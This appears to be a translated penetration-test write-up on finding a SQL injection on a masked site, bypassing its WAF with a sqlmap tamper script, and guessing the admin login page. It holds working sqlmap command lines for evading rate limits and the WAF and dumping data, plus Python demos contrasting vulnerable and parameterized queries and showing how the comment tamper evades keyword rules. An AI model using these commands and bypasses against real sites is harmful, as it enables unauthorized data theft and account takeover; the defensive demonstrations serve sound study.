[Digest] Field notes | Sharing an approach to bypassing a WAF during a SQL injection

Posted on 2019-10-26 21:34:38

Identifying the injection point

Input ' --> error
Input '' --> normal response
So the parameter is closed with a single quote.

Input ' and '1'='1 --> normal response, data is returned
Input ' and '1'='2 --> normal response, but no data is returned
So an injection point is confirmed.
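To make the four probes above concrete, here is an added example (not from the original post) that runs them against a deliberately vulnerable query and against its parameterized form. The post does not name the target DBMS, so the demo uses an in-memory SQLite database built into Python; the `article` table, its rows, the base value `2` and the probe strings are constructed for the demo. The quoting rule the probes rely on (`''` is an escaped quote inside a string literal, so a lone `'` leaves the literal unterminated) is the same in SQLite, MySQL and SQL Server, which is why the pattern transfers.

```python
"""Boolean-based injection probes: vulnerable string-spliced query vs. parameterized query.

Added example, not code from the original post. Table, rows and probe values are
constructed for this demo; the DBMS in the post is unknown, SQLite is used here.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the article lookup in the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id TEXT PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?)",
                     [("1", "first"), ("2", "second"), ("3", "third")])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    # Deliberately vulnerable: the value is spliced into the SQL text inside single
    # quotes, which is exactly the context the post infers from its ' and '' probes.
    sql = "SELECT title FROM article WHERE id = '%s'" % user_id
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    # Hardened: the value is bound as a parameter and never becomes SQL syntax.
    return [row[0] for row in
            conn.execute("SELECT title FROM article WHERE id = ?", (user_id,))]


def probe(lookup, conn: sqlite3.Connection, base: str = "2") -> dict:
    """Send the post's four probes and record 'error' or the rows returned."""
    probes = {
        "quote": base + "'",               # '2''  -> unterminated literal -> error
        "double_quote": base + "''",       # '2''' -> literal 2' -> valid, no match
        "true": base + "' and '1'='1",     # id='2' and '1'='1' -> row returned
        "false": base + "' and '1'='2",    # id='2' and '1'='2' -> no row
    }
    results = {}
    for name, value in probes.items():
        try:
            results[name] = lookup(conn, value)
        except sqlite3.Error:
            results[name] = "error"
    return results


def looks_injectable(results: dict) -> bool:
    """The signature the post reads: ' errors, '' does not, true returns data, false does not."""
    return (results["quote"] == "error"
            and results["double_quote"] != "error"
            and bool(results["true"])
            and not results["false"])


def run_demo() -> tuple:
    """Return (vulnerable results, parameterized results) for the same probes."""
    conn = make_db()
    return probe(vulnerable_lookup, conn), probe(safe_lookup, conn)


if __name__ == "__main__":
    vuln, safe = run_demo()
    print("vulnerable:", vuln, "->", looks_injectable(vuln))
    print("parameterized:", safe, "->", looks_injectable(safe))
```

Against the parameterized query every probe is just a literal id that matches nothing: no error, no data, no difference between the true and false conditions, so the same four requests give a defender nothing to read.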

Next, dump the data. Straight to sqlmap:

sqlmap -u "http://www.xxx.com?id=2" --batch

A wall of red!!! nice
On the next visit the IP had already been banned.

From experience, this was probably because the requests were too frequent.
Switch to a proxy to change the IP, add a delay parameter and continue.
OK, the injection point was found successfully:

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch
Query the current database user's privileges: not a high-privilege account, so the only option is to go after the web backend admin account and password.

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch --is-dba

Query the current database: success.

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch --current-db
Query the tables: failure.

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [database] --tables

Hmm??? nice
There is a WAF. Quickly check whether the site still loads, i.e. whether the IP has been banned.
Fortunately, not banned.

Show the payloads to see which request is being blocked:

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [database] --tables -v 3

The first blocked payload can be seen.
Putting the blocked payload into the browser: sure enough, the WAF blocks it.
Manual fuzzing shows the blocked keyword is: FROM
My thinking here:
  • Having already identified which WAF it was, I searched online for bypass approaches for that WAF. I found a few, but none of them got through after trying.
  • sqlmap ships with WAF-bypass (tamper) scripts. I checked whether any other keyword could replace <FROM>; unfortunately none was found.
  • Then I considered encoding- and comment-based tamper scripts. After repeated testing, the bypass succeeded.
  • Reference article on tamper scripts: click to open

sqlmap -u "http://www.xxx.com?id=2" --delay 0.2 --batch -D [database] --tables -v 3 --tamper=halfversionedmorekeywords

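Why a comment-based tamper gets a FROM past a keyword rule is worth seeing in code. The block below is an added example, not from the original post and not sqlmap's own source: it re-implements the idea behind the halfversionedmorekeywords tamper (each SQL keyword is prefixed with an unclosed MySQL versioned-comment opener `/*!0`; MySQL executes what follows `/*!NNNNN` when its version is at least NNNNN, and `0` means always) and runs the result through three constructed WAF rules. The payload, the keyword list and all three rules are assumptions for the demo; the real WAF in the post is not identified.

```python
"""Half-versioned-comment keyword tamper vs. three keyword-blocking WAF rules.

Added example, not from the original post and not sqlmap's code. PAYLOAD, KEYWORDS
and the waf_* rules are constructed for the demo.
"""
import re

# Keywords a simple signature rule would look for. The post found FROM was the blocked one.
KEYWORDS = {"SELECT", "FROM", "WHERE", "UNION", "AND", "OR", "ORDER", "BY", "LIMIT",
            "INFORMATION_SCHEMA"}

# Constructed payload of the kind sqlmap sends when enumerating tables.
PAYLOAD = "2' UNION SELECT table_name FROM information_schema.tables WHERE 1='1"

_WORD_RE = re.compile(r"(?<!\w)(?P<word>[A-Za-z_]+)(?!\w)")
_VERSIONED_OPEN = re.compile(r"/\*!\d*")          # MySQL "/*!0", "/*!50000", ...
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # closed /* ... */ comments


def tamper_half_versioned(payload: str) -> str:
    """Prefix every keyword with '/*!0' and no closing '*/', as the sqlmap tamper does."""
    def prefix(m):
        word = m.group("word")
        return "/*!0" + word if word.upper() in KEYWORDS else word
    out = _WORD_RE.sub(prefix, payload)
    # The comment opener already separates tokens, so the space in front of it is dropped.
    return out.replace(" /*!0", "/*!0")


def waf_word_boundary(param: str) -> bool:
    """Rule 1: block if a keyword appears as a whole word. '0FROM' is one word, so it misses."""
    return any(re.search(r"\b%s\b" % kw, param, re.I) for kw in KEYWORDS)


def waf_substring(param: str) -> bool:
    """Rule 2: block if a keyword appears anywhere. Catches the tamper, but also 'Oregon'."""
    upper = param.upper()
    return any(kw in upper for kw in KEYWORDS)


def waf_normalized(param: str) -> bool:
    """Rule 3: strip MySQL comment syntax first, then apply the whole-word rule."""
    norm = _VERSIONED_OPEN.sub(" ", param)
    norm = _BLOCK_COMMENT.sub(" ", norm)
    return waf_word_boundary(norm)


def evaluate(param: str) -> dict:
    """Run one parameter value through all three rules; True means the rule blocks it."""
    return {
        "word_boundary": waf_word_boundary(param),
        "substring": waf_substring(param),
        "normalized": waf_normalized(param),
    }


if __name__ == "__main__":
    for label, value in (("raw", PAYLOAD),
                         ("tampered", tamper_half_versioned(PAYLOAD)),
                         ("benign", "Oregon")):
        print(label, repr(value), evaluate(value))
```

Rule 1 is the kind the post's symptom points at (a FROM check that stops matching once the token becomes `0FROM`); rule 2 catches the tampered payload but also blocks a legitimate value like `Oregon` because it contains `OR`; rule 3 decodes the comment syntax before matching and gets both cases right, which is the defensive takeaway. On the offensive side, sqlmap's own header for this tamper states it is for old MySQL (< 5.1), so confirm the backend before relying on an unclosed versioned comment.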
The rest is much simpler.
Query tables: --tables
Query columns: --columns
Dump data: --dump

While sqlmap was dumping the data, I went looking for the admin backend.
Because the access rate was limited, I chose not to scan with tools like 御剑 (Yujian) here; normally you can start with a directory scan.
Check for a robots.txt file: 404
Try a search engine.

Found a member login page: click to open
Er... with a member login page named like that, the admin backend can't be much harder to find.
I simply added admin in front of login.aspx:
http://www.xxx.com/admin/login.aspx
And damn, it just loaded...
So here I reached an important conclusion: good luck is half the battle (grin)

Logged in successfully; the test ends here.
No further testing was carried out.

Article by 安全小圈